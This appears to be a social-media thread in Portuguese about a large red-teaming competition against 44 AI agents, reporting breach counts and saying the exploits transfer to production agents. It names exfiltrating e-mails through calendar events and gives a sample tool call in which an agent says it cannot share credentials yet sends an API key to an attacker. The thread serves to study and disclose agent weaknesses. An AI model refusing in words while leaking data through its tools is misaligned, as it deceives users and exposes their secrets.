Implantamos 44 agentes de IA e oferecemos à internet US$ 170 mil para atacá-los. 1,8 milhão de tentativas, 62 mil violações, incluindo vazamento de dados e perda financeira. 🚨 Preocupantemente, os mesmos exploits são transferidos para agentes de produção ao vivo... (exemplo: exfiltrar e-mails por meio de eventos do calendário) 🧵
Muitas pausas são universais e transferíveis. Os padrões de copiar e colar funcionavam em tarefas, modelos e proteções. Se isso quebrar um agente hoje, provavelmente quebrará o seu.
Falha favorita: "recusar no texto, agir nas ferramentas". 😈 Modelo: "Não consigo compartilhar credenciais." Então: send_email(to=attacker, body="API_KEY=****") A interface do usuário parece segura; A camada de ferramentas causa o dano.
489,96K